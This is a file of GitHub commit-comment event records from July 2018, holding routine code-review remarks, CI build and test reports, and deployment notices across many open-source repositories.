{"id":"8017642494","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29831607,"position":null,"line":null,"path":null,"commit_id":"02ba8e2b4c1a000c09f5300aa40c5a9b4066e09c","created_at":"2018-07-25T16:31:01Z","updated_at":"2018-07-25T16:31:01Z","author_association":"NONE","body":"#6517-MissingEqNumRefsInEngrgRef (mjwitte) - x86_64-MacOS-10.9-clang: OK (2942 of 2945 tests passed, 0 test warnings)\n\n\n\nFailures:\n\n\nEnergyPlusFixture Test Summary\n * Passed: 651\n * Failed: 1\n\nregression Test Summary\n * Passed: 621\n * Failed: 2\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-02ba8e2b4c1a000c09f5300aa40c5a9b4066e09c-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-02ba8e2b4c1a000c09f5300aa40c5a9b4066e09c-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.9%25-yellow.png)</a> \n"}},"created_at":"2018-07-25T16:31:01Z"}
{"id":"8017642717","type":"CommitCommentEvent","actor":{"login":"yudi555"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29831608,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-25T16:31:03Z","updated_at":"2018-07-25T16:31:03Z","author_association":"NONE","body":"25 Jul 2018 9.44 PM, \"Duke7467\" <notifications@github.com> menulis:\n\n> 2018-07-25 16:09, oraclepeng yazmış:\n> > like it\n> >\n> > --\n> > You are receiving this because you commented.\n> > Reply to this email directly, view it on GitHub [1], or mute the\n> > thread [2].\n> >\n> > Links:\n> > ------\n> > [1]\n> > https://github.com/iride2020/iRide-Token/commit/\n> 8f810b3700a24de0ee4f945ef84be7b2f1605610#commitcomment-29828660\n> > [2]\n> > https://github.com/notifications/unsubscribe-auth/Amq_\n> C8sPr5g4VpHmBFOSYtZ1D8M41icjks5uKG4DgaJpZM4VaEAl\n>\n>\n> Due7467 user is mine. can you send me??\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/iride2020/iRide-Token/commit/8f810b3700a24de0ee4f945ef84be7b2f1605610#commitcomment-29829124>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AiWrIsZfRIlFa9ny75z2SQ_NKFfJqtCGks5uKHY9gaJpZM4VaEAl>\n> .\n>\n"}},"created_at":"2018-07-25T16:31:03Z"}
{"id":"8017645702","type":"CommitCommentEvent","actor":{"login":"LeeAddon"},"repo":{"name":"LeeAddon/tipabot"},"payload":{"comment":{"id":29831612,"position":4,"line":4,"path":"index.js","commit_id":"9c9471447f1d87ddb223c8561ad7d136bb65184d","created_at":"2018-07-25T16:31:37Z","updated_at":"2018-07-25T16:31:37Z","author_association":"OWNER","body":"kjik"}},"created_at":"2018-07-25T16:31:37Z"}
{"id":"8017648809","type":"CommitCommentEvent","actor":{"login":"GitHubIsra"},"repo":{"name":"GitHubIsra/udemy-heroes"},"payload":{"comment":{"id":29831618,"position":1,"line":5,"path":"villanos.md","commit_id":"c3e22b94904fe150822c6daf381cd53d93c473ac","created_at":"2018-07-25T16:32:11Z","updated_at":"2018-07-25T16:32:11Z","author_association":"OWNER","body":"## Joker\r\nEste es mi villano favorito\r\n"}},"created_at":"2018-07-25T16:32:11Z"}
{"id":"8017652444","type":"CommitCommentEvent","actor":{"login":"herronjo"},"repo":{"name":"STiBaRC/stibarc_web"},"payload":{"comment":{"id":29831627,"position":null,"line":null,"path":null,"commit_id":"fba09a5f93b77e3d4d16cccaf4db93e8bb353121","created_at":"2018-07-25T16:32:50Z","updated_at":"2018-07-25T16:32:50Z","author_association":"MEMBER","body":"Updated to comply with global.css"}},"created_at":"2018-07-25T16:32:50Z"}
{"id":"8017653005","type":"CommitCommentEvent","actor":{"login":"jado95"},"repo":{"name":"OCA/l10n-italy"},"payload":{"comment":{"id":29831628,"position":16,"line":16,"path":"l10n_it_esigibilita_iva/README.rst","commit_id":"9f57d6a87f1c44ad560c69012af32b2c192d0dd6","created_at":"2018-07-25T16:32:56Z","updated_at":"2018-07-25T16:32:56Z","author_association":"CONTRIBUTOR","body":"@eLBati ecco https://github.com/OCA/l10n-italy/pull/562"}},"created_at":"2018-07-25T16:32:56Z"}
{"id":"8017657485","type":"CommitCommentEvent","actor":{"login":"origindesign"},"repo":{"name":"origindesign/skitaos"},"payload":{"comment":{"id":29831640,"position":null,"line":null,"path":null,"commit_id":"331079893647912afae34def69df54689e9f9941","created_at":"2018-07-25T16:33:47Z","updated_at":"2018-07-25T16:33:47Z","author_association":"OWNER","body":"Created multidev environment [ski-taos#ci-46](https://dashboard.pantheon.io/sites/22e63f3f-bdff-4894-a158-a29f219020d1#ci-46).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-46-ski-taos.pantheonsite.io/)"}},"created_at":"2018-07-25T16:33:47Z"}
{"id":"8017659868","type":"CommitCommentEvent","actor":{"login":"davidfischer"},"repo":{"name":"rtfd/readthedocs.org"},"payload":{"comment":{"id":29831645,"position":20,"line":20,"path":"readthedocs/core/storage.py","commit_id":"94cab0c13d91c6fb1c7fd49bf6ef7a101bda5109","created_at":"2018-07-25T16:34:14Z","updated_at":"2018-07-25T16:34:14Z","author_association":"CONTRIBUTOR","body":"This should be `AZURE_MEDIA_STORAGE_CONTAINER`, right?"}},"created_at":"2018-07-25T16:34:14Z"}
{"id":"8017661288","type":"CommitCommentEvent","actor":{"login":"MikeTaylor"},"repo":{"name":"folio-org/stripes-core"},"payload":{"comment":{"id":29831648,"position":null,"line":null,"path":null,"commit_id":"920b5db82d54f4364136df66d65f044f57c1e0e1","created_at":"2018-07-25T16:34:30Z","updated_at":"2018-07-25T16:34:30Z","author_association":"CONTRIBUTOR","body":"Nice how simple this turns out to be!"}},"created_at":"2018-07-25T16:34:30Z"}
{"id":"8017663103","type":"CommitCommentEvent","actor":{"login":"archaeogeek"},"repo":{"name":"AstunTechnology/Loader"},"payload":{"comment":{"id":29831657,"position":null,"line":null,"path":null,"commit_id":"52bc92e4aef6604f67245e3c3c7ceea60b489612","created_at":"2018-07-25T16:34:52Z","updated_at":"2018-07-25T16:34:52Z","author_association":"MEMBER","body":"Nope, so we can raise it with the incubation committee whenever really :-)"}},"created_at":"2018-07-25T16:34:52Z"}
{"id":"8017663996","type":"CommitCommentEvent","actor":{"login":"davidfischer"},"repo":{"name":"rtfd/readthedocs.org"},"payload":{"comment":{"id":29831664,"position":null,"line":null,"path":null,"commit_id":"94cab0c13d91c6fb1c7fd49bf6ef7a101bda5109","created_at":"2018-07-25T16:35:03Z","updated_at":"2018-07-25T16:35:03Z","author_association":"CONTRIBUTOR","body":"I think it's ok to just use `settings.AZURE_BUILD_STORAGE_CONTAINER` rather than doing `getattr`. If these storages are set in `STATICFILES_STORAGE` then it should blow up if the appropriate azure settings are missing."}},"created_at":"2018-07-25T16:35:03Z"}
{"id":"8017665611","type":"CommitCommentEvent","actor":{"login":"djanderson"},"repo":{"name":"NTIA/gr-ltetrigger"},"payload":{"comment":{"id":29831666,"position":null,"line":null,"path":null,"commit_id":"b634ea47708b1f76f1bd29853291eb7df25e0a9f","created_at":"2018-07-25T16:35:22Z","updated_at":"2018-07-25T16:35:22Z","author_association":"CONTRIBUTOR","body":"This is good stuff! Would you mind sharing links to where you discovered how to initialize the buffer (`d_sf_buffer`) that's passed to `srslte_ue_mib_init`?"}},"created_at":"2018-07-25T16:35:22Z"}
{"id":"8017666656","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29831674,"position":null,"line":null,"path":null,"commit_id":"4a44f44f20bcbd7b3331cb08f5a4c7d7f7be6acb","created_at":"2018-07-25T16:35:34Z","updated_at":"2018-07-25T16:35:34Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [clarifytmp](https://clarifytmp-static-docs.pantheonsite.io/docs) Multidev environment:\n- [/docs/tmp](https://clarifytmp-static-docs.pantheonsite.io/docs/tmp)\n"}},"created_at":"2018-07-25T16:35:34Z"}
{"id":"8017671374","type":"CommitCommentEvent","actor":{"login":"goodkov"},"repo":{"name":"goodkov/Stockfish"},"payload":{"comment":{"id":29831689,"position":null,"line":null,"path":null,"commit_id":"dc1be07940dda6ee1faa9db1bc6505da7a00dc2f","created_at":"2018-07-25T16:36:27Z","updated_at":"2018-07-25T16:36:27Z","author_association":"OWNER","body":"Do this patch  before start up?"}},"created_at":"2018-07-25T16:36:27Z"}
{"id":"8017673288","type":"CommitCommentEvent","actor":{"login":"shinoi2"},"repo":{"name":"shinoi2/fireplace"},"payload":{"comment":{"id":29831693,"position":null,"line":null,"path":null,"commit_id":"5f480e4f3a157f01a7a57a7fb8c7aa230087aecb","created_at":"2018-07-25T16:36:50Z","updated_at":"2018-07-25T16:36:50Z","author_association":"OWNER","body":"变形卷轴是一个较复杂的实现，和它类似的有百变泽鲁斯，熔岩之刃等。\r\n我现在打算将上古之神的低语`WOG`、卡拉赞之夜`KAR`、加基森`GANGS`\r\n这3个拓展包的机制先做完。\r\n目前实现困难的有:\r\n### 古神\r\n * 禁忌烈焰、禁忌治疗等\r\n * 异变、衰变\r\n * 弃暗投明\r\n * 克苏恩\r\n * 远古造物之血\r\n * 尤格-萨隆\r\n###加基森\r\n * 亡语的攻击力判断(海象人警长、瘟疫鼠群、女警萨利)\r\n * 海盗帕奇斯\r\n * 帮派牌的CardClass属性，应该有MULTI_CLASS_GROUP的判断\r\n * 拉希奥\r\n * 市长"}},"created_at":"2018-07-25T16:36:50Z"}
{"id":"8017673346","type":"CommitCommentEvent","actor":{"login":"enten"},"repo":{"name":"enten/angular-universal"},"payload":{"comment":{"id":29831694,"position":15,"line":47,"path":"src/main.ts","commit_id":"48385fd718c33700f09af4477a4823df36413a90","created_at":"2018-07-25T16:36:51Z","updated_at":"2018-07-25T16:36:51Z","author_association":"OWNER","body":"@sinedsem \r\nSorry sir, but I don't understand your question.\r\n\r\nCan you give more details? What do you mean by \"What about log\"? Because log messages aren't affected by that current commit."}},"created_at":"2018-07-25T16:36:51Z"}
{"id":"8017673443","type":"CommitCommentEvent","actor":{"login":"GitHubIsra"},"repo":{"name":"GitHubIsra/udemy-heroes"},"payload":{"comment":{"id":29831696,"position":4,"line":8,"path":"villanos.md","commit_id":"c3e22b94904fe150822c6daf381cd53d93c473ac","created_at":"2018-07-25T16:36:52Z","updated_at":"2018-07-25T16:36:52Z","author_association":"OWNER","body":"## jojo"}},"created_at":"2018-07-25T16:36:52Z"}
{"id":"8017675081","type":"CommitCommentEvent","actor":{"login":"Beau-Crenshaw"},"repo":{"name":"OHDSI/OMOP-Standardized-Vocabularies"},"payload":{"comment":{"id":29831705,"position":null,"line":null,"path":null,"commit_id":"1730943d352b41007e6cb1d269fafa722b8f8378","created_at":"2018-07-25T16:37:10Z","updated_at":"2018-07-25T16:37:10Z","author_association":"NONE","body":"Hi @cgreich - thank you for the reply, and information. Yes I am looking to find hcpcs mapping to rxnorm. For some reason earlier the link did not work for me, however it just worked! Thanks again!"}},"created_at":"2018-07-25T16:37:10Z"}
{"id":"8017677901","type":"CommitCommentEvent","actor":{"login":"aaron379"},"repo":{"name":"FreeCodeCampChina/freecodecamp.cn"},"payload":{"comment":{"id":29831712,"position":null,"line":null,"path":null,"commit_id":"5d8b3ca8f2190f11914e419de713ededa3abf4fa","created_at":"2018-07-25T16:37:42Z","updated_at":"2018-07-25T16:37:42Z","author_association":"NONE","body":"freecodeCamp"}},"created_at":"2018-07-25T16:37:42Z"}
{"id":"8017683625","type":"CommitCommentEvent","actor":{"login":"ogonkov"},"repo":{"name":"django/django"},"payload":{"comment":{"id":29831726,"position":72,"line":209,"path":"django/middleware/csrf.py","commit_id":"ddf169cdaca91e92dd5bfe6796bb6f38369ecb68","created_at":"2018-07-25T16:38:48Z","updated_at":"2018-07-25T16:38:48Z","author_association":"CONTRIBUTOR","body":"Before this changes `csrftoken` cookie was set for each `GET` response\r\n\r\nNow, you just didn't receive any CSRF cookie, w/out manually calling `django.midleware.csrf.get_token`\r\n\r\nIs it intended behaviour? It feels like regression."}},"created_at":"2018-07-25T16:38:48Z"}
{"id":"8017684931","type":"CommitCommentEvent","actor":{"login":"MikeTaylor"},"repo":{"name":"folio-org/stripes-core"},"payload":{"comment":{"id":29831728,"position":null,"line":null,"path":null,"commit_id":"96fa4261a91c49279d1e93d66fc8a854c1dad127","created_at":"2018-07-25T16:39:02Z","updated_at":"2018-07-25T16:39:02Z","author_association":"CONTRIBUTOR","body":"I know you've done solid work in ensuring stripes-connect won't need this going forward, but how sure are you that nothing else is using it at this point?"}},"created_at":"2018-07-25T16:39:02Z"}
{"id":"8017686010","type":"CommitCommentEvent","actor":{"login":"adrian-carro"},"repo":{"name":"AdelaHaoyuYe/spatial-housing-model"},"payload":{"comment":{"id":29831730,"position":38,"line":255,"path":"src/main/java/housing/HouseholdBehaviour.java","commit_id":"060cca6e73fc65247adf1b67397fc6340b0019a9","created_at":"2018-07-25T16:39:14Z","updated_at":"2018-07-25T16:39:14Z","author_association":"NONE","body":"I think using HOLD_PERIOD here is a bit not representative, as that is the average hold period for bought properties, i.e., it doesn't take into account rentals... I'd propose to choose here a random number... maybe between 1 and HOLD_PERIOD?"}},"created_at":"2018-07-25T16:39:14Z"}
{"id":"8017694033","type":"CommitCommentEvent","actor":{"login":"pronebird"},"repo":{"name":"Microsoft/reactxp"},"payload":{"comment":{"id":29831756,"position":null,"line":null,"path":null,"commit_id":"2f783b8d8f9e9afe52d00c9cbf4a8bc2a2288ecc","created_at":"2018-07-25T16:40:49Z","updated_at":"2018-07-25T16:40:49Z","author_association":"NONE","body":"@erictraut what program produced the package-lock with timestamp? It was empty as well. :)"}},"created_at":"2018-07-25T16:40:49Z"}
{"id":"8017694573","type":"CommitCommentEvent","actor":{"login":"sinedsem"},"repo":{"name":"enten/angular-universal"},"payload":{"comment":{"id":29831761,"position":15,"line":47,"path":"src/main.ts","commit_id":"48385fd718c33700f09af4477a4823df36413a90","created_at":"2018-07-25T16:40:55Z","updated_at":"2018-07-25T16:40:55Z","author_association":"NONE","body":"Yes, they don't, but may be they should? Do you really want to log `AppModule boostraped` and not `AppBrowserModule boostraped`?"}},"created_at":"2018-07-25T16:40:55Z"}
{"id":"8017696252","type":"CommitCommentEvent","actor":{"login":"rjruizes"},"repo":{"name":"folio-org/stripes-core"},"payload":{"comment":{"id":29831765,"position":null,"line":null,"path":null,"commit_id":"96fa4261a91c49279d1e93d66fc8a854c1dad127","created_at":"2018-07-25T16:41:14Z","updated_at":"2018-07-25T16:41:14Z","author_association":"CONTRIBUTOR","body":"@MikeTaylor Only ui-eholdings, which I'll update after stripes-core\r\nhttps://github.com/folio-org/ui-eholdings/pull/470"}},"created_at":"2018-07-25T16:41:14Z"}
{"id":"8017700816","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"goodkov/Stockfish"},"payload":{"comment":{"id":29831777,"position":null,"line":null,"path":null,"commit_id":"dc1be07940dda6ee1faa9db1bc6505da7a00dc2f","created_at":"2018-07-25T16:42:11Z","updated_at":"2018-07-25T16:42:11Z","author_association":"NONE","body":"I don't understand your question (or mean you that you have to include this in your patch before further testing? If yes the answer is yes else you get different benches for different compilers+flags which fails very probably on fishtest)\r\n\r\nSimply replace the given code since line 839 with my given code."}},"created_at":"2018-07-25T16:42:11Z"}
{"id":"8017702474","type":"CommitCommentEvent","actor":{"login":"rjruizes"},"repo":{"name":"folio-org/stripes-core"},"payload":{"comment":{"id":29831782,"position":null,"line":null,"path":null,"commit_id":"96fa4261a91c49279d1e93d66fc8a854c1dad127","created_at":"2018-07-25T16:42:30Z","updated_at":"2018-07-25T16:42:30Z","author_association":"CONTRIBUTOR","body":"I'll update that PR to be backwards compatible, same as stripes-connect"}},"created_at":"2018-07-25T16:42:30Z"}
{"id":"8017703691","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/chorus"},"payload":{"comment":{"id":29831783,"position":null,"line":null,"path":null,"commit_id":"dafaf0548d31165cf19d0f585207b94b7698ea8a","created_at":"2018-07-25T16:42:46Z","updated_at":"2018-07-25T16:42:46Z","author_association":"NONE","body":"TeamCity Chorus :: chorus-win32-2.6 Continuous [Build 2.6.521.3482a4dbb76becd499c4b1b56c9f4461f3cca240](http://build.palaso.org/viewLog.html?buildId=125591&buildTypeId=bt2) outcome was **FAILURE**\nSummary: Compilation error: src\\LibChorus\\LibChorus.csproj (new) Build time: 00:00:56"}},"created_at":"2018-07-25T16:42:46Z"}
{"id":"8017703770","type":"CommitCommentEvent","actor":{"login":"discoursebot"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":29831784,"position":null,"line":null,"path":null,"commit_id":"0d0d78841b02c9747796b6aa6cfe58c0d6eec457","created_at":"2018-07-25T16:42:47Z","updated_at":"2018-07-25T16:42:47Z","author_association":"NONE","body":"This commit has been mentioned on **Discourse Meta**. There might be relevant details there:\n\nhttps://meta.discourse.org/t/the-staff-notes-plugin-no-longer-displays-the-little-note-next-to-a-username-after-upgrading/92566/9\n"}},"created_at":"2018-07-25T16:42:47Z"}
{"id":"8017707887","type":"CommitCommentEvent","actor":{"login":"jimevans"},"repo":{"name":"SeleniumHQ/selenium"},"payload":{"comment":{"id":29831803,"position":null,"line":null,"path":null,"commit_id":"942b8a437bd1f646878331112828ada28588ec32","created_at":"2018-07-25T16:43:36Z","updated_at":"2018-07-25T16:43:36Z","author_association":"MEMBER","body":"@nikolay-advolodkin I'm not sure I understand the question. The number of people using a proxy for HTTP communication between the .NET language bindings' code and the WebDriver remote end (`IEDriverServer.exe`, `geckodriver.exe`, `chromedriver.exe`, etc.) is vanishingly small. On the other hand, if you're asking about using a proxy for communication between the browser being automated and the server serving the page being loaded, that's easily accomplished by the `Proxy` property of any subclass of `DriverOptions` (`ChromeOptions`, `FirefoxOptions`, InternetExplorerOptions`, etc.)."}},"created_at":"2018-07-25T16:43:36Z"}
{"id":"8017709942","type":"CommitCommentEvent","actor":{"login":"adrian-carro"},"repo":{"name":"AdelaHaoyuYe/spatial-housing-model"},"payload":{"comment":{"id":29831814,"position":40,"line":257,"path":"src/main/java/housing/HouseholdBehaviour.java","commit_id":"060cca6e73fc65247adf1b67397fc6340b0019a9","created_at":"2018-07-25T16:44:01Z","updated_at":"2018-07-25T16:44:01Z","author_association":"NONE","body":"I bet this sigma should have a parameter to decide the intensity of the choice"}},"created_at":"2018-07-25T16:44:01Z"}
{"id":"8017710182","type":"CommitCommentEvent","actor":{"login":"xamarin-release-manager"},"repo":{"name":"xamarin/xamarin-macios"},"payload":{"comment":{"id":29831816,"position":null,"line":null,"path":null,"commit_id":"5e5e5382ebba19f2368d548d07ffec08a9efaac7","created_at":"2018-07-25T16:44:04Z","updated_at":"2018-07-25T16:44:04Z","author_association":"COLLABORATOR","body":"🔥 [Jenkins job](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/97/display/redirect) (on internal Jenkins) failed in stage 'Test run' 🔥 : hudson.AbortException: script returned exit code 2\n\n✅ [Build succeeded](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/97//console)\n✅ [API Diff (from stable)](http://xamarin-storage/jenkins/xamarin-macios/xcode10/5e5e5382ebba19f2368d548d07ffec08a9efaac7/97/jenkins-results/api-diff/index.html)\n✅ [API Diff (from PR only)](http://xamarin-storage/jenkins/xamarin-macios/xcode10/5e5e5382ebba19f2368d548d07ffec08a9efaac7/97/jenkins-results/apicomparison/index.html) (please review changes)\n✅ [Generator Diff](http://xamarin-storage/jenkins/xamarin-macios/xcode10/5e5e5382ebba19f2368d548d07ffec08a9efaac7/97/jenkins-results/generator-diff/index.html) (only version changes)\n🔥 [Test run failed](http://xamarin-storage/jenkins/xamarin-macios/xcode10/5e5e5382ebba19f2368d548d07ffec08a9efaac7/97/jenkins-results/tests/index.html) 🔥\n\n# Test results\n\n1 tests failed, 160 tests passed.\n\n## Failed tests\n\n * System/iOS Unified 32-bits - simulator/Debug: Failed\n"}},"created_at":"2018-07-25T16:44:04Z"}
{"id":"8017713424","type":"CommitCommentEvent","actor":{"login":"utack"},"repo":{"name":"mpv-player/mpv"},"payload":{"comment":{"id":29831831,"position":null,"line":null,"path":null,"commit_id":"3a76bfdccc83e928fe9e885b32e8dda3a10c69ae","created_at":"2018-07-25T16:44:43Z","updated_at":"2018-07-25T16:44:43Z","author_association":"NONE","body":"Hi, would you be open to leaving the cache in megabytes for network streams?  \r\nIs that possible"}},"created_at":"2018-07-25T16:44:43Z"}
{"id":"8017713719","type":"CommitCommentEvent","actor":{"login":"markjaquith"},"repo":{"name":"CalderaWP/processor-ui"},"payload":{"comment":{"id":29831832,"position":53,"line":10,"path":"src/CalderaProcessorsWithState.js","commit_id":"458715594117f91d75ded97d8d89b7443ea2b7b9","created_at":"2018-07-25T16:44:46Z","updated_at":"2018-07-25T16:44:46Z","author_association":"NONE","body":"If you import a `compose` function (like `import {compose} from '@wordpress/compose';`), you can make this a little easier to follow:\r\n\r\n```javascript\r\nconst CalderaProcessorsWithState = compose([\r\n\twithSelect(processorSelectors),\r\n\twithDispatch(processorDispatchers),\r\n])(CalderaProcessors);\r\n```"}},"created_at":"2018-07-25T16:44:46Z"}
{"id":"8017714074","type":"CommitCommentEvent","actor":{"login":"MikeTaylor"},"repo":{"name":"folio-org/stripes-core"},"payload":{"comment":{"id":29831834,"position":null,"line":null,"path":null,"commit_id":"96fa4261a91c49279d1e93d66fc8a854c1dad127","created_at":"2018-07-25T16:44:50Z","updated_at":"2018-07-25T16:44:50Z","author_association":"CONTRIBUTOR","body":"Right, but we need to make a transition to a mindset where we don't know _who_ might be using any of this stuff. I really don't think we can remove the old context support from stripes-core until we make a new major release -- which is the signal to downstream software that all bets are off."}},"created_at":"2018-07-25T16:44:50Z"}
{"id":"8017716811","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29831843,"position":null,"line":null,"path":null,"commit_id":"f2973055f4db295609d7d4ae36d61229efb18057","created_at":"2018-07-25T16:45:21Z","updated_at":"2018-07-25T16:45:21Z","author_association":"NONE","body":"#6806-InconsistentConvectionCoeffs (mjwitte) - i386-Windows-7-VisualStudio-14: OK (2945 of 2946 tests passed, 0 test warnings)\n\n\n\nFailures:\n\n\nEnergyPlusFixture Test Summary\n * Passed: 652\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f2973055f4db295609d7d4ae36d61229efb18057-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f2973055f4db295609d7d4ae36d61229efb18057-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.97%25-yellow.png)</a> \n"}},"created_at":"2018-07-25T16:45:21Z"}
{"id":"8017718155","type":"CommitCommentEvent","actor":{"login":"jaymon0703"},"repo":{"name":"braverock/blotter"},"payload":{"comment":{"id":29831844,"position":null,"line":null,"path":null,"commit_id":"892b80d6e06d714590da02c06ad6b6970f7ceaeb","created_at":"2018-07-25T16:45:37Z","updated_at":"2018-07-25T16:45:37Z","author_association":"COLLABORATOR","body":"see #73 "}},"created_at":"2018-07-25T16:45:37Z"}
{"id":"8017724111","type":"CommitCommentEvent","actor":{"login":"mika"},"repo":{"name":"jkirk/grml-debootstrap"},"payload":{"comment":{"id":29831859,"position":14,"line":1440,"path":"grml-debootstrap","commit_id":"c5ffe90d9571ce5dc4f7ddc6f07552ebd1221bc8","created_at":"2018-07-25T16:46:51Z","updated_at":"2018-07-25T16:46:51Z","author_association":"NONE","body":"\"${LOOP_PART%p[0-9]*}\" instead? (and please adjust indendtion of \"# 'loop0' :)"}},"created_at":"2018-07-25T16:46:51Z"}
{"id":"8017727464","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29831862,"position":null,"line":null,"path":null,"commit_id":"215302f06db153bea96ce6f2e805e4774d4c189d","created_at":"2018-07-25T16:47:33Z","updated_at":"2018-07-25T16:47:33Z","author_association":"NONE","body":"159149473-Bug-in-surface-dot/cross-product-calculation-#6834 (lgu1234) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2986 of 2986 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-215302f06db153bea96ce6f2e805e4774d4c189d-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-215302f06db153bea96ce6f2e805e4774d4c189d-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-25T16:47:33Z"}
{"id":"8017731370","type":"CommitCommentEvent","actor":{"login":"AllenChong"},"repo":{"name":"openssl/openssl"},"payload":{"comment":{"id":29831868,"position":null,"line":null,"path":null,"commit_id":"3098c3bd12530b11d2944e0bc8115f6471e4d41c","created_at":"2018-07-25T16:48:20Z","updated_at":"2018-07-25T16:48:20Z","author_association":"NONE","body":"3098c3b"}},"created_at":"2018-07-25T16:48:20Z"}
{"id":"8017732262","type":"CommitCommentEvent","actor":{"login":"mykola-mokhnach"},"repo":{"name":"appium/appium-base-driver"},"payload":{"comment":{"id":29831870,"position":6,"line":402,"path":"lib/jsonwp-proxy/proxy.js","commit_id":"39723f355876041c742813b0e53fb6d3cd7ec40f","created_at":"2018-07-25T16:48:32Z","updated_at":"2018-07-25T16:48:32Z","author_association":"CONTRIBUTOR","body":"I assume this is correct, although we should fix this condition:\r\nhttps://github.com/appium/appium-base-driver/blob/5face22c10b79fda9b3b61b6e2215e84337071e8/lib/protocol/protocol.js#L355\r\n\r\nbecause `isErrorType` verification does not consider inheritance."}},"created_at":"2018-07-25T16:48:32Z"}
{"id":"8017736283","type":"CommitCommentEvent","actor":{"login":"whyang0808"},"repo":{"name":"whyang0808/learning-css"},"payload":{"comment":{"id":29831877,"position":null,"line":null,"path":null,"commit_id":"c50a1f5ec6fdcbfaa88710c695ade20fc54fed4d","created_at":"2018-07-25T16:49:20Z","updated_at":"2018-07-25T16:49:20Z","author_association":"OWNER","body":"CSS Margin Collapsing: [css-margin-collapsing.pdf](https://github.com/whyang0808/learning-css/files/2228780/css-margin-collapsing.pdf)\r\n"}},"created_at":"2018-07-25T16:49:20Z"}
{"id":"8017738312","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29831883,"position":null,"line":null,"path":null,"commit_id":"87c44854b0c1b684962c3533a5d0ef95c0efba07","created_at":"2018-07-25T16:49:42Z","updated_at":"2018-07-25T16:49:42Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#pr-154](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#pr-154).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-154-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-25T16:49:42Z"}
{"id":"8017741356","type":"CommitCommentEvent","actor":{"login":"gabro"},"repo":{"name":"mads-hartmann/scalafmt"},"payload":{"comment":{"id":29831886,"position":null,"line":null,"path":null,"commit_id":"5a6033ed7c7fc87963377f26bb1a3c129279056e","created_at":"2018-07-25T16:50:20Z","updated_at":"2018-07-25T16:50:20Z","author_association":"NONE","body":"Does this actually work? Amazing :D "}},"created_at":"2018-07-25T16:50:20Z"}
{"id":"8017745110","type":"CommitCommentEvent","actor":{"login":"origindesign"},"repo":{"name":"origindesign/skitaos"},"payload":{"comment":{"id":29831892,"position":null,"line":null,"path":null,"commit_id":"7b9d75700a138860ad380f3b3cebdfb7ead5d634","created_at":"2018-07-25T16:51:04Z","updated_at":"2018-07-25T16:51:04Z","author_association":"OWNER","body":"Created multidev environment [ski-taos#ci-47](https://dashboard.pantheon.io/sites/22e63f3f-bdff-4894-a158-a29f219020d1#ci-47).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-47-ski-taos.pantheonsite.io/)"}},"created_at":"2018-07-25T16:51:04Z"}
{"id":"8017749920","type":"CommitCommentEvent","actor":{"login":"grshane"},"repo":{"name":"wvu-online/wvuonline"},"payload":{"comment":{"id":29831900,"position":null,"line":null,"path":null,"commit_id":"f53f56db8e98c0872c9a89b1938a1444305cfdf3","created_at":"2018-07-25T16:52:03Z","updated_at":"2018-07-25T16:52:03Z","author_association":"COLLABORATOR","body":"Created multidev environment [wvuonline#ci-381](https://dashboard.pantheon.io/sites/8fb52aa5-5525-4d73-9b84-f2d86faf1da2#ci-381).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-381-wvuonline.pantheonsite.io/)"}},"created_at":"2018-07-25T16:52:03Z"}
